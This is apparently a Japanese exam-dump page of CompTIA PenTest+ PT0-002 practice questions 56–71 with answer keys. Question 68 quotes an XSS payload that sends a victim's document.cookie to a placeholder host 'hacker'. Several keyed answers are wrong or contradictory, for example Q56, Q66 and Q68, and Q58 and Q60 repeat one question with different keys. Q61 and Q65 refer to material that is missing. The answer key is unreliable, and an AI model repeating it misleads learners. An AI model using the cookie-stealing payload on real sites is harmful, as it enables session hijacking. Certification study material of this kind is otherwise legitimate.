売れ筋トップクラスのPT0-002最新試験問題2021年最新のCompTIA試験練習 [Q56-Q72]

売れ筋トップクラスのPT0-002最新試験問題2021年最新のCompTIA試験練習

CompTIA PenTest+問題集でPT0-002試験は完全版問題で試験学習ガイド

質問 56
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

A. Port knocking
B. Open-source research
C. A ping sweep
D. An Nmap scan
E. Traffic sniffing
F. A vulnerability scan

正解: D,F

質問 57
A penetration tester is attempting to discover live hosts on a subnet quickly.
Which of the following commands will perform a ping scan?

A. nmap -sn 10.12.1.0/24
B. nmap -sT -p- 10.12.1.0/24
C. nmap -sV -A 10.12.1.0/24
D. nmap -Pn 10.12.1.0/24

正解: A

質問 58
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
Have a full TCP connection
Send a "hello" payload
Walt for a response
Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

A. Run nmap -Pn -sV -script vuln <IP address>.
B. Employ an OpenVAS simple scan against the TCP port of the host.
C. Create a script in the Lua language and use it with NSE.
D. Perform a credentialed scan with Nessus.

正解: D

質問 59
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

A. Perform forensic analysis to isolate the means of compromise and determine attribution.
B. Incorporate the newly identified method of compromise into the red team's approach.
C. Halt the assessment and follow the reporting procedures as outlined in the contract.
D. Create a detailed document of findings before continuing with the assessment.

正解: D

質問 60
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
* Have a full TCP connection
* Send a "hello" payload
* Walt for a response
* Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

A. Create a script in the Lua language and use it with NSE.
B. Run nmap -Pn -sV -script vuln <IP address>.
C. Employ an OpenVAS simple scan against the TCP port of the host.
D. Perform a credentialed scan with Nessus.

正解: A

質問 61
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

正解:

解説:

Explanation
1. Reflected XSS - Input sanitization (<> ...)
2. Sql Injection Stacked - Parameterized Queries
3. DOM XSS - Input Sanitization (<> ...)
4. Local File Inclusion - sandbox req
5. Command Injection - sandbox req
6. SQLi union - paramtrized queries
7. SQLi error - paramtrized queries
8. Remote File Inclusion - sandbox
9. Command Injection - input saniti $
10. URL redirect - prevent external calls

質問 62
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

A. A firewall or IPS blocked the scan.
B. The penetration tester used unsupported flags.
C. The scan returned ICMP echo replies.
D. The edge network device was disconnected.

正解: A

質問 63
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.
Which of the following is MOST vulnerable to a brute-force attack?

A. WPS
B. WPA2-EAP
C. WPA2-PSK
D. WPA-TKIP

正解: A

質問 64
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

A. chmod o+e script.sh
B. chmod o+x script.sh
C. chmod u+e script.sh
D. chmod u+x script.sh

正解: D

質問 65
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A. Burp Suite and DIRB
B. Netcat and cURL
C. Hydra and crunch
D. Nmap and OWASP ZAP

正解: A

質問 66
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

A. Halt the penetration test.
B. Assume the alert is from the penetration test.
C. Deconflict with the penetration tester.
D. Contact law enforcement.

正解: D

質問 67
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

A. DNSSEC
B. S/MIME
C. AS2
D. FTPS

正解: B

質問 68
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

A. Output encoding
B. Session tokens
C. Web-application firewall
D. Base64 encoding
E. Parameterized queries
F. Input validation

正解: E,F

質問 69
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

A. Stop the assessment and inform the emergency contact.
B. Remove the malware immediately.
C. Do a root-cause analysis to find out how the malware got in.
D. Collect the proper evidence and then remove the malware.
E. Analyze the malware to see what it does.

正解: A

質問 70
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

A. Physical environment testing
B. Partially known environment testing
C. Known environment testing
D. Unknown environment testing

正解: D

質問 71
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.